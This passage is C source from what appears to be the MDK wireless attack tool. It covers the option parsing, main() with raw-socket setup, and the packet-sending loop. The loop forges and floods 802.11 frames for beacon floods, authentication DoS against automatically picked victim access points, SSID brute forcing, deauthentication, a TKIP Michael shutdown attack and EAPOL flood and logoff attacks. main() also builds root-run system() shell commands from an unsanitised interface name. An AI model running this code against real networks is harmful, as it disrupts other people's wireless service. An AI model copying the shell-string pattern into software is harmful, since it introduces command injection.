	    if (! strcmp(argv[t], "-n")) {
              if (! (argc > t+1)) { printf(use_eapo); return -1; }
              ssid = argv[t + 1];
	    }
	    if (! strcmp(argv[t], "-t")) {
		if (! (argc > t+1)) { printf(use_eapo); return -1; }
		target = (uchar *) parse_mac(argv[t+1]);
                memcpy(eapol_dst, target, 6);
	    }
	    if (! strcmp(argv[t], "-c")) {
		if (! (argc > t+1)) { printf(use_eapo); return -1; }
		mac_sa = (uchar *) parse_mac(argv[t+1]);
                memcpy(eapol_src, mac_sa, 6);
	    }
	    if (! strcmp(argv[t], "-s")) if (argc > t+1) {
		pps = strtol(argv[t+1], (char **) NULL, 10);
		usespeed = 1;
	    }
	    if (! strcmp(argv[t], "-w")) if (argc > t+1) {
		eapol_wtype = strtol(argv[t+1], (char **) NULL, 10);
	    }
	    if (! strcmp(argv[t], "-u")) if (argc > t+1) {
		eapol_ucast = strtol(argv[t+1], (char **) NULL, 10);
	    }
	    if (! strcmp(argv[t], "-m")) if (argc > t+1) {
		eapol_mcast = strtol(argv[t+1], (char **) NULL, 10);
	    }
	}
	break;
    default:
	printf(use_head);
	return -1;
	break;
    }

    printf("\n");

    if ((mode == 'P') && (usespeed == 0)) {
	usespeed = 1; pps = 300;
    }
    if ((mode == 'P') && (real_brute) && (target == NULL)) {
	printf("Please specify a target (-t <MAC>)\n");
	return -1;
    }
    if ((mode == 'p') && (ssid == NULL) && (ssid_file_name == NULL)) {
	printf("Please specify an ESSID (option -e) , a filename (option -f) or bruteforce mode (-b)\n");
	return -1;
    }
    if ((mode == 'P') && (target == NULL))
	printf("WARNING: No target (-t <MAC>) specified, will show ALL responses and stop on EOF!\n");
    if ((mode == 'p') && (target != NULL))
	printf("WARNING: Target ignored when not in Bruteforce mode\n");
    if ((mode == 'm') && (target == NULL))
    {
        printf("Please specify MAC (option -t)\n");
        return -1;
    }
    if (mode == 'x') {
	if ( (target == NULL) && (eapol_attack == EAPOL_ATTACK_START_FLOOD) ) {
          printf("Please specify MAC of target AP (option -t)\n");
          return -1;
        }
        if ( (ssid == NULL) && (eapol_attack == EAPOL_ATTACK_START_FLOOD) ) {
          printf("Please specify a SSID (option -n)\n");
          return -1;
        }
        if ( (mac_sa == NULL) && (eapol_attack == EAPOL_ATTACK_LOGOFF) ) {
          printf("Please specify MAC of target STA (option -c)\n");
          return -1;
        }
    }

    /* Main packet sending loop */

    while(1)
    {

	/* Creating Packets, do sniffing */

	switch (mode)
	{
	case 'B':
	    if ((nb_sent % 30 == 0) || (total_time % 3 == 0))  // Switch Channel every 30 frames or 3 seconds
	    {
		if (fchan) {
		    set_channel(fchan);
		    chan = fchan;
		} else {
		    chan = generate_channel();
		    set_channel(chan);
		}
	    }
	    frm = create_beacon_frame(ssid, chan, wep, random_mac, gmode, adhoc, adv);
	    break;
	case 'b':
	    if (fchan) chan = fchan;
		else chan = generate_channel();
	    frm = create_beacon_frame(ssid, chan, wep, random_mac, gmode, adhoc, adv);
	    break;
	case 'a':  // Automated Auth DoS mode
	    if ((nb_sent % 512 == 0) || (total_time % 30 == 0))  // After 512 attack packets or 30 seconds, search for new victim
	    {
		printf ("\rTrying to get a new victim...                  \n");
		ap = get_victim_ap();
	    }
	case 'A':  // Auth DoS mode with victim MAC given
	    frm = create_auth_frame(ap, random_mac);
	    break;
	case 'p':
	    mac = generate_mac(1);
	    frm = create_probe_frame(ssid, mac);
	    break;
	case 'P':
	    if (real_brute) {
		frm = ssid_brute_real(0);
	    } else {
		frm = ssid_brute(0);
	    }
	    break;
	case 'd':
	    frm = amok_machine(0);
	    break;
        case 'm':
            frm = false_tkip(target);
            break;
	case 'x':
            switch (eapol_attack) {
              case EAPOL_ATTACK_START_FLOOD:
                frm = eapol_machine(ssid, strlen(ssid), target, eapol_wtype, eapol_ucast, eapol_mcast);
                break;
              case EAPOL_ATTACK_LOGOFF:
                frm = eapol_logoff(eapol_dst, eapol_src);
                break;
            }
	    break;
	}

	/* Sending packet, increase counters */

	send_packet(frm.data, frm.len);
	nb_sent_ps++;
	nb_sent++;

	/* User wants check for responses? */

	if ((mode=='a' || mode=='A') && ! check) check_auth(ap);
	if (mode=='p') resps += check_probe(ssid, mac);

	/* Does another thread want to exit? */

	if (exit_now) return 0;

	/* Waiting for Hannukah */

	if (usespeed) usleep(pps2usec(pps));

	/* Print speed, packet count and stats every second */

	if( time( NULL ) - t_prev >= 1 )
        {
            t_prev = time( NULL );
	    print_stats(mode, frm, resps, nb_sent_ps);
	    printf ("\rPackets sent: %6d - Speed: %4d packets/sec", nb_sent, nb_sent_ps);
	    /* DEBUG
	    printf("\nSNIFFED:\n");
	    print_packet(victim, 32);
	    printf("\nFORGED:\n");
	    print_packet(frm.data, frm.len);
	      END DEBUG */
	    fflush(stdout);
	    nb_sent_ps=0;
	    resps=0;
	    total_time++;
	}

	// Waiting for next burst in Michael Attack
        if(! (nb_sent % ppb) && (mode == 'm')) sleep(wait);

    }   // Play it again, Johnny!

    printf("You were not supposed to reach this code...\n");
    return 0;
}

/* MAIN */

int main( int argc, char *argv[] )
{
    char strbuf[512];            // Stringbuffer for system calls
    char athXraw[] = "athXraw";  // Space for Atheros RAW Interface name

    if( geteuid() != 0 )
    {
        printf( "This program requires root privileges.\n" );
        return( 1 );
    }


    if( argc < 2 )
    {
	printf(use_head);
        return( 1 );
    }

    if( !memcmp(argv[1], "--help", 6))
    {
	if( argc < 3 ) {
	    printf(use_head);
            return( 1 );
	}

	switch (argv[2][0]) {
	    case 'b':
		printf(use_beac);
		break;
	    case 'a':
		printf(use_auth);
		break;
	    case 'p':
		printf(use_prob);
		break;
	    case 'd':
		printf(use_deau);
		break;
	    case 'm':
		printf(use_mich);
		break;
	    case 'x':
		printf(use_eapo);
		break;
	    default:
		printf(use_head);
        }
	return(0);
    }

    if( !memcmp(argv[1], "--fullhelp", 10))
    {
	printf(use_head);
	printf("\n\n");
	printf(use_beac);
	printf(use_auth);
	printf(use_prob);
	printf(use_deau);
	printf(use_mich);
	printf(use_eapo);
	return (0);
    }

    memset( &dev, 0, sizeof( dev ) );

    dev.fd_rtc = -1;

    dev.fd_in = dev.fd_out = (int) argv[1];

    dev.iface = argv[1];

    /* create the RAW sockets */

    if( ( dev.fd_in = socket( PF_PACKET, SOCK_RAW,
                              htons( ETH_P_ALL ) ) ) < 0 )
    {
        perror( "socket(PF_PACKET) failed" );
        if( getuid() != 0 )
            fprintf( stderr, "This program requires root privileges.\n" );
        return( 1 );
    }

    if( ( dev.fd_out = socket( PF_PACKET, SOCK_RAW,
                               htons( ETH_P_ALL ) ) ) < 0 )
    {
        perror( "socket(PF_PACKET) failed" );
        return( 1 );
    }

    /* check if wlan-ng or hostap or r8180 */

    if( strlen( argv[1] ) == 5 &&
        memcmp( argv[1], "wlan", 4 ) == 0 )
    {
        memset( strbuf, 0, sizeof( strbuf ) );
        snprintf( strbuf,  sizeof( strbuf ) - 1,
                  "wlancfg show %s 2>/dev/null | "
                  "grep p2CnfWEPFlags >/dev/null",
                  argv[1] );

        if( system( strbuf ) == 0 )
            dev.is_wlanng = 1;

        memset( strbuf, 0, sizeof( strbuf ) );
        snprintf( strbuf,  sizeof( strbuf ) - 1,
                  "iwpriv %s 2>/dev/null | "
                  "grep antsel_rx >/dev/null",
                  argv[1] );

        if( system( strbuf ) == 0 )
            dev.is_hostap = 1;
    }

    /* enable injection on ralink */

    if( memcmp( argv[1], "ra", 2 ) == 0 ||
        memcmp( argv[1], "rausb", 5 ) == 0 )
    {
        memset( strbuf, 0, sizeof( strbuf ) );
        snprintf( strbuf,  sizeof( strbuf ) - 1,
                  "iwpriv %s rfmontx 1 &>/dev/null",
                  argv[1] );
        system( strbuf );
    }

    /* check if newer athXraw interface available */

    if( strlen( argv[1] ) == 4 &&
        memcmp( argv[1], "ath", 3 ) == 0 )
    {
        memset( strbuf, 0, sizeof( strbuf ) );
        snprintf( strbuf,  sizeof( strbuf ) - 1,
                  "sysctl -w dev.%s.rawdev=1 &>/dev/null",
                  argv[1] );

        if( system( strbuf ) == 0 )
        {
            athXraw[3] = argv[1][3];

            memset( strbuf, 0, sizeof( strbuf ) );
            snprintf( strbuf,  sizeof( strbuf ) - 1,
                      "ifconfig %s up", athXraw );
            system( strbuf );
            argv[1] = athXraw;
        }
    }

    /* drop privileges */

    setuid( getuid() );

    /* open the replay interface */

    dev.is_madwifi = ( memcmp( argv[1], "ath", 3 ) == 0 );

    dev.is_orinoco = ( memcmp( argv[1], "eth", 3 ) == 0 );

    if( openraw( argv[1], dev.fd_out, &dev.arptype_out ) != 0 )
        return( 1 );

    dev.fd_in = dev.fd_out;
    dev.arptype_in = dev.arptype_out;

    /*
    * running attack functions
    *
    * insert own attacks here!
    */

    int retval = mdk_attack_parser(argc, argv);

    return( retval );
}
